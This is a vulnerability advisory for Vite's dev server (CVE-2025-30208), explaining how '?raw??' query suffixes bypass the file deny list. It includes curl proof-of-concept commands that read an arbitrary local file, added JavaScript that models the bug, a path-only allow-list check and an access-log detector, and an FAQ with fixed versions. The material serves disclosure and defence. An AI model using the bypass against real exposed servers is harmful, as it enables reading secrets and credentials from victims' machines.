CVE-2025-30208: Vite bypasses server.fs.deny when using `?raw??`
### Summary

The contents of arbitrary files can be returned to the browser.

### Impact

Only apps that explicitly expose the Vite dev server to the network (using `--host` or the [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.

### Details

`@fs` denies access to files outside of Vite's serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists.

The bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in the query string regexes, so the two sides of the check disagree about what the request is.

### PoC

```bash
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"
<body>
<h1>403 Restricted</h1>
<p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```
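The following is an added example, not code from Vite or from the advisory. It models the bug class the Details section describes: one step strips trailing `?`/`&` separators while another matches the raw URL with an anchored query regex, so the two disagree about whether `?import&raw??` is a raw request. It then shows the defensive shape (normalize once, inspect parsed parameter names, and run the allow-list check on the path alone) and a small detector for `/@fs/` requests with stray separators in access logs. The anchored regex idiom, the `ALLOWED_ROOTS` value, the log-line format and the sample lines are all assumptions constructed for illustration.

```javascript
// Added example, not Vite's own code. Models the inconsistency described in
// the advisory and a path-only allow-list check plus a log detector.

// Anchored regex in the common "(\?|&)raw(&|$)" idiom (an assumption about
// the idiom, not a copy of Vite's source).
const ANCHORED_RAW_RE = /(?:\?|&)raw(?:&|$)/;

// Lenient cleanup step: drop any run of trailing "?" or "&" separators.
function stripTrailingSeparators(url) {
  return url.replace(/[?&]+$/, "");
}

// Three views of the same request string. The mismatch between
// anchoredMatch and normalizedMatch is the inconsistency the advisory names.
function classifyRawQuery(url) {
  const parsed = new URL(url, "http://localhost");
  return {
    anchoredMatch: ANCHORED_RAW_RE.test(url),
    normalizedMatch: ANCHORED_RAW_RE.test(stripTrailingSeparators(url)),
    // WHATWG parsing keeps the stray "?" inside the parameter name ("raw??").
    paramNames: [...parsed.searchParams.keys()],
  };
}

// Hardened query check: normalize separators first, then inspect parsed
// parameter names instead of running a regex over the raw string.
function isRawRequest(url) {
  const parsed = new URL(stripTrailingSeparators(url), "http://localhost");
  return parsed.searchParams.has("raw");
}

// Path-only allow-list check. It never looks at the query string, so no
// query suffix can change the answer. ALLOWED_ROOTS is a constructed value.
const ALLOWED_ROOTS = ["/srv/app"];
function isPathAllowed(url) {
  let pathname;
  try {
    pathname = decodeURIComponent(new URL(url, "http://localhost").pathname);
  } catch {
    return false; // malformed percent-encoding: deny
  }
  if (pathname.startsWith("/@fs/")) pathname = pathname.slice("/@fs".length);
  // Collapse "." and ".." segments so traversal cannot escape a root.
  const segments = [];
  for (const seg of pathname.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") segments.pop();
    else segments.push(seg);
  }
  const normalized = "/" + segments.join("/");
  return ALLOWED_ROOTS.some(
    (root) => normalized === root || normalized.startsWith(root + "/")
  );
}

// Detection: a second "?" inside the query, or a dangling "?"/"&" at its end,
// is the request shape shown in the PoC.
function hasStraySeparators(url) {
  const q = url.indexOf("?");
  if (q === -1) return false;
  const query = url.slice(q + 1);
  return query.includes("?") || /[?&]$/.test(query);
}

// Scan access-log lines in a constructed "<ip> <method> <url> <status>" format
// and report /@fs/ requests carrying stray separators.
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const fields = line.trim().split(/\s+/);
    if (fields.length < 4) continue;
    const [ip, , url, status] = fields;
    if (url.includes("/@fs/") && hasStraySeparators(url)) {
      hits.push({ ip, url, status });
    }
  }
  return hits;
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  "10.0.0.5 GET /src/main.ts?import 200",
  "10.0.0.5 GET /@fs/srv/app/src/App.vue?raw 200",
  "203.0.113.9 GET /@fs/tmp/secret.txt 403",
  "203.0.113.9 GET /@fs/tmp/secret.txt?import&raw?? 200",
  "203.0.113.9 GET /@fs/tmp/notes.txt?raw?? 200",
];

console.log(classifyRawQuery("/@fs/tmp/secret.txt?import&raw??"));
console.log("raw request:", isRawRequest("/@fs/tmp/secret.txt?import&raw??"));
console.log("path allowed:", isPathAllowed("/@fs/tmp/secret.txt?import&raw??"));
console.log("suspicious requests:", scanAccessLog(SAMPLE_LOG));
```

Run with `node`. The `classifyRawQuery` output for the PoC URL shows `anchoredMatch: false` but `normalizedMatch: true`: the anchored regex does not see a raw request while the separator-stripping path does, which is exactly the kind of disagreement that lets one code path serve content the other never vetted. The design point of `isPathAllowed` is that the allow-list decision depends only on the resolved path, so query-string tricks cannot influence it; the log scan is a cheap retrospective check for the request shape from the PoC.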
### Frequently Asked Questions

**What is the severity of CVE-2025-30208?**

CVE-2025-30208 is considered a high severity vulnerability due to the potential for unauthorized file access.

**How do I fix CVE-2025-30208?**

Update Vite to the fixed release for your release line: 6.2.3, 6.1.2, 6.0.12, 5.4.15, or 4.5.10 (or a later version on that line).

**What versions of Vite are affected by CVE-2025-30208?**

Versions of Vite prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10 on their respective release lines are affected by CVE-2025-30208.

**What type of vulnerability is CVE-2025-30208?**

CVE-2025-30208 is an improper access control vulnerability: the dev server's file access restrictions (`server.fs.deny` and the serving allow list) can be bypassed.

**What can an attacker do with CVE-2025-30208?**

An attacker who can reach an exposed dev server can read files outside of the allowed list by appending a crafted query string, such as `?raw??`, to an `/@fs/` URL.